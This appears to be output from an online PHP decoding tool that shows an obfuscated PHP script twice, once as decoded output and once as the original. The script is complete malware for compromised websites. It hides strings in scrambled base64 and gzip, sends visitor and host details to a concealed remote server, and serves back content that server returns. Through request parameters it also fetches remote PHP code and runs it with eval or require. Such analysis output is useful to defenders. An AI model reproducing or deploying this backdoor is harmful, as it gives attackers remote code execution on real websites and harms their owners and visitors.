Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%..
Decoded Output download
<?php
$x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");
error_reporting(0);
$xyyzz__zy_ = "Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU=";
$x__yz_yzzy = "Ha0RHc6MyLj9nLpdzYuU2Yt9wL==";
function custom_decode_func($xyz_yyz_z_)
{ //x_zz_z_yyy($xyz_yyz_z_)
$x_zzy_y_yz = substr($xyz_yyz_z_, 0, 5);
$xyzzyy__z_ = substr($xyz_yyz_z_, -5);
$x_zy_zyzy_ = substr($xyz_yyz_z_, 7, strlen($xyz_yyz_z_) - 14);
return gzinflate(base64_decode($x_zzy_y_yz . $x_zy_zyzy_ . $xyzzyy__z_));
}
function xy_zyyz__z($xz_zy__zyy)
{
if (!preg_match("/^https*\:\/\//si", $xz_zy__zyy)) {
return '500';
}
$xy_y_zzz_y = file_get_contents($xz_zy__zyy);
if ($xy_y_zzz_y != false) {
return $xy_y_zzz_y;
}
$x_yzz_z_yy = "curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create";
$xy_zyzy__z = $xzyyz_y_z_ = $xyzy_yz_z_ = $xy_yy__zzzrr_str = '';
foreach (explode('|', $x_yzz_z_yy) as $c) {
$xz_yz_y_yz = 1;
foreach (explode('+', $c) as $d) {
if (!function_exists($d)) {
$xz_yz_y_yz = 0;
}
}
unset($d);
if ($xz_yz_y_yz) {
$xy_zyzy__z = $c;
break;
}
}
unset($x_yzz_z_yy, $c);
if ($xy_zyzy__z == '') {
return 0;
}
if (substr($xy_zyzy__z, 0, 1) == 'c') {
$xyyz__yzz_ = curl_init();
curl_setopt($xyyz__yzz_, CURLOPT_URL, $xz_zy__zyy);
curl_setopt($xyyz__yzz_, CURLOPT_USERAGENT, 's');
curl_setopt($xyyz__yzz_, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($xyyz__yzz_, CURLOPT_TIMEOUT, 100);
curl_setopt($xyyz__yzz_, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($xyyz__yzz_, CURLOPT_SSL_VERIFYPEER, 0);
$xz_y_yz_yz = curl_exec($xyyz__yzz_);
curl_close($xyyz__yzz_);
if (!$xz_y_yz_yz) {
return '501';
} else {
return $xz_y_yz_yz;
}
}
$xz__yzyy_z = parse_url($xz_zy__zyy);
isset($xz__yzyy_z["host"]) || $xz__yzyy_z["host"] = '';
isset($xz__yzyy_z["path"]) || $xz__yzyy_z["path"] = '';
isset($xz__yzyy_z["query"]) || $xz__yzyy_z["query"] = '';
isset($xz__yzyy_z["port"]) || $xz__yzyy_z["port"] = '';
$x_zzy__yyz = $xz__yzyy_z["path"] ? $xz__yzyy_z["path"] . ($xz__yzyy_z["query"] ? '?' . $xz__yzyy_z["query"] : '') : '/';
$xzy_y__zzy = $xz__yzyy_z["host"];
if ($xz__yzyy_z["scheme"] == 'https') {
$xzz_y_zyy_ = '1.1';
$x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 443 : $xz__yzyy_z["port"];
$xzy_y__zzy = 'ssl://';
$xzy_y__zzy .= $xz__yzyy_z["host"];
} else {
$xzz_y_zyy_ = '1.0';
$x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 80 : $xz__yzyy_z["port"];
}
$x_zzyyy_z_ = 'Host:';
$x_zzyyy_z_ .= $xzy_y__zzy;
$headers[] = $x_zzyyy_z_;
$headers[] = custom_decode_func('c87PymS0tNLsnMz7NyzskNivTgUA');
$headers[] = custom_decode_func('Cy1OLbCdJ1TE/NK7ErMqBgA=');
$headers[] = custom_decode_func('c0xOTXJi0osdLtWS1wIA');
unset($x_zzyyy_z_);
$xzyyz_y_z_ = "GET $x_zzy__yyz HTTP/$xzz_y_zyy_" . PHP_EOL . join(PHP_EOL, $headers) . PHP_EOL . PHP_EOL;
unset($headers, $xz__yzyy_z, $xzz_y_zyy_, $x_zzy__yyz);
$x_y_zz_yzy = null;
if (substr($xy_zyzy__z, -1) == 'n') {
$x_y_zz_yzy = $xy_zyzy__z($xzy_y__zzy, $x_zyyyz_z_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
} else {
if (substr($xy_zyzy__z, -1) == 't') {
$xzzzyy__y_ = custom_decode_func('K0kusibNLVEXBwA=');
$xzzzyy__y_ .= $xzy_y__zzy;
$xzzzyy__y_ .= ':';
$xzzzyy__y_ .= $x_zyyyz_z_;
$x_y_zz_yzy = fwrite($xzzzyy__y_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
unset($xzzzyy__y_);
}
}
$x_yy_z_zyz = '';
if ($x_y_zz_yzy) {
stream_set_blocking($x_y_zz_yzy, TRUE);
stream_set_timeout($x_y_zz_yzy, 30);
fwrite($x_y_zz_yzy, $xzyyz_y_z_);
$x_z_y_yzyz = stream_get_meta_data($x_y_zz_yzy);
if (!$x_z_y_yzyz["timed_out"]) {
while (!feof($x_y_zz_yzy)) {
$xzyy__z_yz = fgets($x_y_zz_yzy);
if ($xzyy__z_yz && (rawurlencode($xzyy__z_yz) == "%0D%0A" || rawurlencode($xzyy__z_yz) == "%0A")) {
break;
}
unset($xzyy__z_yz);
}
while (!feof($x_y_zz_yzy)) {
$xzz_y_yyz_ = fread($x_y_zz_yzy, 8192);
$x_yy_z_zyz .= $xzz_y_yyz_;
unset($xzz_y_yyz_);
}
}
unset($x_z_y_yzyz);
fclose($x_y_zz_yzy);
} else {
if (substr($xy_zyzy__z, -1) == 'e') {
$x__zyzzy_y = gethostbyname($xzy_y__zzy);
$x_y_zz_yzy = $xy_zyzy__z(AF_INET, SOCK_STREAM, 0);
if (socket_connect($x_y_zz_yzy, $x__zyzzy_y, $x_zyyyz_z_)) {
socket_write($x_y_zz_yzy, $xzyyz_y_z_, strlen($xzyyz_y_z_));
while ($x__yyz_yzz = @socket_read($x_y_zz_yzy, 8192)) {
$x_yy_z_zyz .= $x__yyz_yzz;
unset($x__yyz_yzz);
}
$x_yy_z_zyz = explode("
", $x_yy_z_zyz);
array_shift($x_yy_z_zyz);
$x_yy_z_zyz = implode("
", $x_yy_z_zyz);
}
socket_close($x_y_zz_yzy);
unset($x__zyzzy_y);
}
}
unset($xzyyz_y_z_, $xy_zyzy__z, $x_y_zz_yzy, $x_zyyyz_z_, $xzy_y__zzy);
$x_yy_z_zyz = @preg_replace_callback('/(?:(?:
|
)|^)([0-9A-F]+)(?:
|
){1,2}(.*?)' . '((?:
|
)(?:[0-9A-F]+(?:
|
))|$)/si', 'x_zyzy_z_y', $x_yy_z_zyz);
return trim(trim($x_yy_z_zyz, ""));
}
function x_zyzy_z_y($matches)
{
return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function xyzyz___zy($xzzyy_y__z = '')
{
$xzzyy_y__z = (${"_SERVER"}["HTTP_VIA"]) ? ${"_SERVER"}["HTTP_X_FORWARDED_FOR"] : ${"_SERVER"}["REMOTE_ADDR"];
$xzzyy_y__z = ($xzzyy_y__z) ? $xzzyy_y__z : ${"_SERVER"}["REMOTE_ADDR"];
return trim($xzzyy_y__z);
}
function xzyy_y_zz_($xyz_yyz_z_ = '')
{
if (isset(${"_SERVER"}["HTTP_HOST"])) {
return ${"_SERVER"}["HTTP_HOST"];
} elseif (isset(${"_SERVER"}["SERVER_NAME"])) {
return ${"_SERVER"}["SERVER_NAME"];
}
return $xyz_yyz_z_;
}
function xz_zy_zyy_($xz_zy__zyy)
{
$xzyyz__y_z = xy_zyyz__z($xz_zy__zyy);
$xzz_yy__zy = base64_decode("PD9waHA=");
if (strpos($xzyyz__y_z, $xzz_yy__zy) === false) {
die('get failed');
}
$xyyzyz_z__ = tmpfile();
if (isset($_REQUEST["e"])) {
$xzyyz__y_z = str_replace($xzz_yy__zy, "", $xzyyz__y_z);
$xy_yy__zzz = 'e' . 'v' . 'a' . 'l';
$xy_yy__zzz($xzyyz__y_z);
die();
}
fwrite($xyyzyz_z__, $xzyyz__y_z);
$x_yzz_z_yy = stream_get_meta_data($xyyzyz_z__);
@require($x_yzz_z_yy["uri"]);
fclose($xyyzyz_z__);
die();
}
function x__yzy_yzz($xyyzz__zy_)
{
$x_yzz_y_zy = substr($xyyzz__zy_, strlen($xyyzz__zy_) - 2);
$xyzy__zy_z = str_split($xyyzz__zy_);
$xzzy__yzy_ = '';
for (
$xy_zzyy__z = 0;
$xy_zzyy__z < count($xyzy__zy_z) - 2;
$xy_zzyy__z = $xy_zzyy__z + 2
) {
$xzzy__yzy_ .= $xyzy__zy_z[$xy_zzyy__z + 1] . $xyzy__zy_z[$xy_zzyy__z];
}
$xzzy__yzy_ .= $x_yzz_y_zy;
return $xzzy__yzy_;
}
function x_z_zyyyz_($googleUrl, $x__yzz_yzy, $xy_z_zyz_y)
{
$x_z__yzzyy = 'https://%s/ping?sitemap=%s%s/%s';
$x_y__zzyzy = sprintf($x_z__yzzyy, $googleUrl, $xy_z_zyz_y["protocol"], $xy_z_zyz_y["server_domain"], $x__yzz_yzy);
$xyy_z__zyz = xy_zyyz__z($x_y__zzyzy);
if (isset($_REQUEST["st"])) {
var_dump($x_y__zzyzy);
var_dump($xyy_z__zyz);
die();
}
$xzyyyz_z__ = custom_decode_func('S8/PTCz89ZcJBQA=');
$x_y_yzzzy_ = custom_decode_func('Ky5NToUk4iBtLgYA');
$xyyzyz__z_ = custom_decode_func('S0vMzEJElwPNAQA=');
if (strpos($xyy_z__zyz, $xzyyyz_z__) != false) {
die($x_y_yzzzy_);
}
die($xyyzyz__z_);
}
function xyy_yzz__z($x_yy_z_zyz)
{
$xyz_zyyz__ = @preg_split("/{\|}/si", $x_yy_z_zyz, -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($xyz_zyyz__)) {
return false;
}
if (count($xyz_zyyz__) != 2) {
return false;
}
return $xyz_zyyz__;
}
function xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy)
{
$xy_z_zyz_y = array();
$xy_z_zyz_y["default_params"] = $xyyzz__zy_;
$xy_z_zyz_y["api"] = base64_decode(x__yzy_yzz($xy_z_zyz_y["default_params"]));
$xy_z_zyz_y["server_domain"] = xzyy_y_zz_();
$xy_z_zyz_y["request_url"] = ${"_SERVER"}["REQUEST_URI"];
$xy_z_zyz_y["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : '';
$xy_z_zyz_y["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : '';
$xy_z_zyz_y["ip"] = xyzyz___zy();
if (isset(${"_SERVER"}["HTTPS"])) {
$xy_z_zyz_y["protocol"] = custom_decode_func('yygpKYcSi20tcykHAA==');
} else {
$xy_z_zyz_y["protocol"] = custom_decode_func('yygpKcEbDdqS1wcA');
}
if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) {
$xy_z_zyz_y["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
} else {
$xy_z_zyz_y["language"] = "";
}
if (isset(${"_GET"}["params"])) {
print_r($xy_z_zyz_y);
die();
}
if (isset(${"_GET"}["sitemap"])) {
$x__yzz_yzy = ${"_GET"}["sitemap"];
$x_yyz_z_zy = custom_decode_func('Ky8v1Oq0vPz0/PSdVLzs8wTFAA==');
if (isset(${"_GET"}["google_url"])) {
$x_yyz_z_zy = ${"_GET"}["google_url"];
}
x_z_zyyyz_($x_yyz_z_zy, $x__yzz_yzy, $xy_z_zyz_y);
}
$xyy_z_zzy_ = custom_decode_func('Uy3Wtsuy+yVS2uySgpKSi20tdPz89Pz0nVS87XyyqoUS22TyzIBEqrJSaDyILEkgwQXQIeUkAA==');
$xyy_z_zzy_ = explode('|', $xyy_z_zzy_);
if (isset($_REQUEST["ac"]) && isset($_REQUEST["path"]) && isset($_REQUEST["t"])) {
xz_zy_zyy_(sprintf($xyy_z_zzy_[2], base64_decode(x__yzy_yzz($x__yz_yzzy)), $xy_z_zyz_y["api"], $_REQUEST["ac"], $_REQUEST["path"], $_REQUEST["t"]));
}
$xy_zzzyy__ = array('doxy_zyzz__y' => $xy_z_zyz_y["server_domain"], 'request_url' => $xy_z_zyz_y["request_url"], 'ip' => $xy_z_zyz_y["ip"], 'agent' => $xy_z_zyz_y["user_agent"], 'referer' => $xy_z_zyz_y["referer"], 'protocol' => $xy_z_zyz_y["protocol"], 'language' => $xy_z_zyz_y["language"]);
$xz_zy__zyy = sprintf($xyy_z_zzy_[0], $xy_z_zyz_y["api"], x__yzy_yzz(base64_encode(implode('{|}', $xy_zzzyy__))));
$x_yy_z_zyz = xy_zyyz__z($xz_zy__zyy);
if (isset($_REQUEST["dump"])) {
var_dump($x_yy_z_zyz);
$x_yy_z_zyz = xy_zyyz__z($xyy_z_zzy_[1]);
var_dump($x_yy_z_zyz);
die();
}
$xzz_y_yyz_ = xyy_yzz__z($x_yy_z_zyz);
if ($xzz_y_yyz_ !== false) {
@header($xzz_y_yyz_[0]);
echo $xzz_y_yyz_[1];
die();
}
}
xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy); ?>Did this file decode correctly?
Original Code
<?php
$x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");
error_reporting(0);
$xyyzz__zy_ = "Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU=";
$x__yz_yzzy = "Ha0RHc6MyLj9nLpdzYuU2Yt9wL==";
function custom_decode_func($xyz_yyz_z_)
{ //x_zz_z_yyy($xyz_yyz_z_)
$x_zzy_y_yz = substr($xyz_yyz_z_, 0, 5);
$xyzzyy__z_ = substr($xyz_yyz_z_, -5);
$x_zy_zyzy_ = substr($xyz_yyz_z_, 7, strlen($xyz_yyz_z_) - 14);
return gzinflate(base64_decode($x_zzy_y_yz . $x_zy_zyzy_ . $xyzzyy__z_));
}
function xy_zyyz__z($xz_zy__zyy)
{
if (!preg_match("/^https*\:\/\//si", $xz_zy__zyy)) {
return '500';
}
$xy_y_zzz_y = file_get_contents($xz_zy__zyy);
if ($xy_y_zzz_y != false) {
return $xy_y_zzz_y;
}
$x_yzz_z_yy = "curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create";
$xy_zyzy__z = $xzyyz_y_z_ = $xyzy_yz_z_ = $xy_yy__zzzrr_str = '';
foreach (explode('|', $x_yzz_z_yy) as $c) {
$xz_yz_y_yz = 1;
foreach (explode('+', $c) as $d) {
if (!function_exists($d)) {
$xz_yz_y_yz = 0;
}
}
unset($d);
if ($xz_yz_y_yz) {
$xy_zyzy__z = $c;
break;
}
}
unset($x_yzz_z_yy, $c);
if ($xy_zyzy__z == '') {
return 0;
}
if (substr($xy_zyzy__z, 0, 1) == 'c') {
$xyyz__yzz_ = curl_init();
curl_setopt($xyyz__yzz_, CURLOPT_URL, $xz_zy__zyy);
curl_setopt($xyyz__yzz_, CURLOPT_USERAGENT, 's');
curl_setopt($xyyz__yzz_, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($xyyz__yzz_, CURLOPT_TIMEOUT, 100);
curl_setopt($xyyz__yzz_, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($xyyz__yzz_, CURLOPT_SSL_VERIFYPEER, 0);
$xz_y_yz_yz = curl_exec($xyyz__yzz_);
curl_close($xyyz__yzz_);
if (!$xz_y_yz_yz) {
return '501';
} else {
return $xz_y_yz_yz;
}
}
$xz__yzyy_z = parse_url($xz_zy__zyy);
isset($xz__yzyy_z["host"]) || $xz__yzyy_z["host"] = '';
isset($xz__yzyy_z["path"]) || $xz__yzyy_z["path"] = '';
isset($xz__yzyy_z["query"]) || $xz__yzyy_z["query"] = '';
isset($xz__yzyy_z["port"]) || $xz__yzyy_z["port"] = '';
$x_zzy__yyz = $xz__yzyy_z["path"] ? $xz__yzyy_z["path"] . ($xz__yzyy_z["query"] ? '?' . $xz__yzyy_z["query"] : '') : '/';
$xzy_y__zzy = $xz__yzyy_z["host"];
if ($xz__yzyy_z["scheme"] == 'https') {
$xzz_y_zyy_ = '1.1';
$x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 443 : $xz__yzyy_z["port"];
$xzy_y__zzy = 'ssl://';
$xzy_y__zzy .= $xz__yzyy_z["host"];
} else {
$xzz_y_zyy_ = '1.0';
$x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 80 : $xz__yzyy_z["port"];
}
$x_zzyyy_z_ = 'Host:';
$x_zzyyy_z_ .= $xzy_y__zzy;
$headers[] = $x_zzyyy_z_;
$headers[] = custom_decode_func('c87PymS0tNLsnMz7NyzskNivTgUA');
$headers[] = custom_decode_func('Cy1OLbCdJ1TE/NK7ErMqBgA=');
$headers[] = custom_decode_func('c0xOTXJi0osdLtWS1wIA');
unset($x_zzyyy_z_);
$xzyyz_y_z_ = "GET $x_zzy__yyz HTTP/$xzz_y_zyy_" . PHP_EOL . join(PHP_EOL, $headers) . PHP_EOL . PHP_EOL;
unset($headers, $xz__yzyy_z, $xzz_y_zyy_, $x_zzy__yyz);
$x_y_zz_yzy = null;
if (substr($xy_zyzy__z, -1) == 'n') {
$x_y_zz_yzy = $xy_zyzy__z($xzy_y__zzy, $x_zyyyz_z_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
} else {
if (substr($xy_zyzy__z, -1) == 't') {
$xzzzyy__y_ = custom_decode_func('K0kusibNLVEXBwA=');
$xzzzyy__y_ .= $xzy_y__zzy;
$xzzzyy__y_ .= ':';
$xzzzyy__y_ .= $x_zyyyz_z_;
$x_y_zz_yzy = fwrite($xzzzyy__y_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
unset($xzzzyy__y_);
}
}
$x_yy_z_zyz = '';
if ($x_y_zz_yzy) {
stream_set_blocking($x_y_zz_yzy, TRUE);
stream_set_timeout($x_y_zz_yzy, 30);
fwrite($x_y_zz_yzy, $xzyyz_y_z_);
$x_z_y_yzyz = stream_get_meta_data($x_y_zz_yzy);
if (!$x_z_y_yzyz["timed_out"]) {
while (!feof($x_y_zz_yzy)) {
$xzyy__z_yz = fgets($x_y_zz_yzy);
if ($xzyy__z_yz && (rawurlencode($xzyy__z_yz) == "%0D%0A" || rawurlencode($xzyy__z_yz) == "%0A")) {
break;
}
unset($xzyy__z_yz);
}
while (!feof($x_y_zz_yzy)) {
$xzz_y_yyz_ = fread($x_y_zz_yzy, 8192);
$x_yy_z_zyz .= $xzz_y_yyz_;
unset($xzz_y_yyz_);
}
}
unset($x_z_y_yzyz);
fclose($x_y_zz_yzy);
} else {
if (substr($xy_zyzy__z, -1) == 'e') {
$x__zyzzy_y = gethostbyname($xzy_y__zzy);
$x_y_zz_yzy = $xy_zyzy__z(AF_INET, SOCK_STREAM, 0);
if (socket_connect($x_y_zz_yzy, $x__zyzzy_y, $x_zyyyz_z_)) {
socket_write($x_y_zz_yzy, $xzyyz_y_z_, strlen($xzyyz_y_z_));
while ($x__yyz_yzz = @socket_read($x_y_zz_yzy, 8192)) {
$x_yy_z_zyz .= $x__yyz_yzz;
unset($x__yyz_yzz);
}
$x_yy_z_zyz = explode("\r\n\r\n", $x_yy_z_zyz);
array_shift($x_yy_z_zyz);
$x_yy_z_zyz = implode("\r\n\r\n", $x_yy_z_zyz);
}
socket_close($x_y_zz_yzy);
unset($x__zyzzy_y);
}
}
unset($xzyyz_y_z_, $xy_zyzy__z, $x_y_zz_yzy, $x_zyyyz_z_, $xzy_y__zzy);
$x_yy_z_zyz = @preg_replace_callback('/(?:(?:\r\n|\n)|^)([0-9A-F]+)(?:\r\n|\n){1,2}(.*?)' . '((?:\r\n|\n)(?:[0-9A-F]+(?:\r\n|\n))|$)/si', 'x_zyzy_z_y', $x_yy_z_zyz);
return trim(trim($x_yy_z_zyz, "\xEF\xBB\xBF"));
}
function x_zyzy_z_y($matches)
{
return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function xyzyz___zy($xzzyy_y__z = '')
{
$xzzyy_y__z = (${"_SERVER"}["HTTP_VIA"]) ? ${"_SERVER"}["HTTP_X_FORWARDED_FOR"] : ${"_SERVER"}["REMOTE_ADDR"];
$xzzyy_y__z = ($xzzyy_y__z) ? $xzzyy_y__z : ${"_SERVER"}["REMOTE_ADDR"];
return trim($xzzyy_y__z);
}
function xzyy_y_zz_($xyz_yyz_z_ = '')
{
if (isset(${"_SERVER"}["HTTP_HOST"])) {
return ${"_SERVER"}["HTTP_HOST"];
} elseif (isset(${"_SERVER"}["SERVER_NAME"])) {
return ${"_SERVER"}["SERVER_NAME"];
}
return $xyz_yyz_z_;
}
function xz_zy_zyy_($xz_zy__zyy)
{
$xzyyz__y_z = xy_zyyz__z($xz_zy__zyy);
$xzz_yy__zy = base64_decode("PD9waHA=");
if (strpos($xzyyz__y_z, $xzz_yy__zy) === false) {
die('get failed');
}
$xyyzyz_z__ = tmpfile();
if (isset($_REQUEST["e"])) {
$xzyyz__y_z = str_replace($xzz_yy__zy, "", $xzyyz__y_z);
$xy_yy__zzz = 'e' . 'v' . 'a' . 'l';
$xy_yy__zzz($xzyyz__y_z);
die();
}
fwrite($xyyzyz_z__, $xzyyz__y_z);
$x_yzz_z_yy = stream_get_meta_data($xyyzyz_z__);
@require($x_yzz_z_yy["uri"]);
fclose($xyyzyz_z__);
die();
}
function x__yzy_yzz($xyyzz__zy_)
{
$x_yzz_y_zy = substr($xyyzz__zy_, strlen($xyyzz__zy_) - 2);
$xyzy__zy_z = str_split($xyyzz__zy_);
$xzzy__yzy_ = '';
for (
$xy_zzyy__z = 0;
$xy_zzyy__z < count($xyzy__zy_z) - 2;
$xy_zzyy__z = $xy_zzyy__z + 2
) {
$xzzy__yzy_ .= $xyzy__zy_z[$xy_zzyy__z + 1] . $xyzy__zy_z[$xy_zzyy__z];
}
$xzzy__yzy_ .= $x_yzz_y_zy;
return $xzzy__yzy_;
}
function x_z_zyyyz_($googleUrl, $x__yzz_yzy, $xy_z_zyz_y)
{
$x_z__yzzyy = 'https://%s/ping?sitemap=%s%s/%s';
$x_y__zzyzy = sprintf($x_z__yzzyy, $googleUrl, $xy_z_zyz_y["protocol"], $xy_z_zyz_y["server_domain"], $x__yzz_yzy);
$xyy_z__zyz = xy_zyyz__z($x_y__zzyzy);
if (isset($_REQUEST["st"])) {
var_dump($x_y__zzyzy);
var_dump($xyy_z__zyz);
die();
}
$xzyyyz_z__ = custom_decode_func('S8/PTCz89ZcJBQA=');
$x_y_yzzzy_ = custom_decode_func('Ky5NToUk4iBtLgYA');
$xyyzyz__z_ = custom_decode_func('S0vMzEJElwPNAQA=');
if (strpos($xyy_z__zyz, $xzyyyz_z__) != false) {
die($x_y_yzzzy_);
}
die($xyyzyz__z_);
}
function xyy_yzz__z($x_yy_z_zyz)
{
$xyz_zyyz__ = @preg_split("/{\|}/si", $x_yy_z_zyz, -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($xyz_zyyz__)) {
return false;
}
if (count($xyz_zyyz__) != 2) {
return false;
}
return $xyz_zyyz__;
}
function xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy)
{
$xy_z_zyz_y = array();
$xy_z_zyz_y["default_params"] = $xyyzz__zy_;
$xy_z_zyz_y["api"] = base64_decode(x__yzy_yzz($xy_z_zyz_y["default_params"]));
$xy_z_zyz_y["server_domain"] = xzyy_y_zz_();
$xy_z_zyz_y["request_url"] = ${"_SERVER"}["REQUEST_URI"];
$xy_z_zyz_y["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : '';
$xy_z_zyz_y["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : '';
$xy_z_zyz_y["ip"] = xyzyz___zy();
if (isset(${"_SERVER"}["HTTPS"])) {
$xy_z_zyz_y["protocol"] = custom_decode_func('yygpKYcSi20tcykHAA==');
} else {
$xy_z_zyz_y["protocol"] = custom_decode_func('yygpKcEbDdqS1wcA');
}
if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) {
$xy_z_zyz_y["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
} else {
$xy_z_zyz_y["language"] = "";
}
if (isset(${"_GET"}["params"])) {
print_r($xy_z_zyz_y);
die();
}
if (isset(${"_GET"}["sitemap"])) {
$x__yzz_yzy = ${"_GET"}["sitemap"];
$x_yyz_z_zy = custom_decode_func('Ky8v1Oq0vPz0/PSdVLzs8wTFAA==');
if (isset(${"_GET"}["google_url"])) {
$x_yyz_z_zy = ${"_GET"}["google_url"];
}
x_z_zyyyz_($x_yyz_z_zy, $x__yzz_yzy, $xy_z_zyz_y);
}
$xyy_z_zzy_ = custom_decode_func('Uy3Wtsuy+yVS2uySgpKSi20tdPz89Pz0nVS87XyyqoUS22TyzIBEqrJSaDyILEkgwQXQIeUkAA==');
$xyy_z_zzy_ = explode('|', $xyy_z_zzy_);
if (isset($_REQUEST["ac"]) && isset($_REQUEST["path"]) && isset($_REQUEST["t"])) {
xz_zy_zyy_(sprintf($xyy_z_zzy_[2], base64_decode(x__yzy_yzz($x__yz_yzzy)), $xy_z_zyz_y["api"], $_REQUEST["ac"], $_REQUEST["path"], $_REQUEST["t"]));
}
$xy_zzzyy__ = array('doxy_zyzz__y' => $xy_z_zyz_y["server_domain"], 'request_url' => $xy_z_zyz_y["request_url"], 'ip' => $xy_z_zyz_y["ip"], 'agent' => $xy_z_zyz_y["user_agent"], 'referer' => $xy_z_zyz_y["referer"], 'protocol' => $xy_z_zyz_y["protocol"], 'language' => $xy_z_zyz_y["language"]);
$xz_zy__zyy = sprintf($xyy_z_zzy_[0], $xy_z_zyz_y["api"], x__yzy_yzz(base64_encode(implode('{|}', $xy_zzzyy__))));
$x_yy_z_zyz = xy_zyyz__z($xz_zy__zyy);
if (isset($_REQUEST["dump"])) {
var_dump($x_yy_z_zyz);
$x_yy_z_zyz = xy_zyyz__z($xyy_z_zzy_[1]);
var_dump($x_yy_z_zyz);
die();
}
$xzz_y_yyz_ = xyy_yzz__z($x_yy_z_zyz);
if ($xzz_y_yyz_ !== false) {
@header($xzz_y_yyz_[0]);
echo $xzz_y_yyz_[1];
die();
}
}
xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy);Function Calls
| strlen | 1 |
| substr | 1 |
| str_split | 1 |
| urldecode | 1 |
| x__yzy_yzz | 1 |
| xy_zyzz__y | 1 |
| error_reporting | 1 |
Stats
| MD5 | 1900595b4bf069ece84730078125ce14 |
| Eval Count | 0 |
| Decode Time | 85 ms |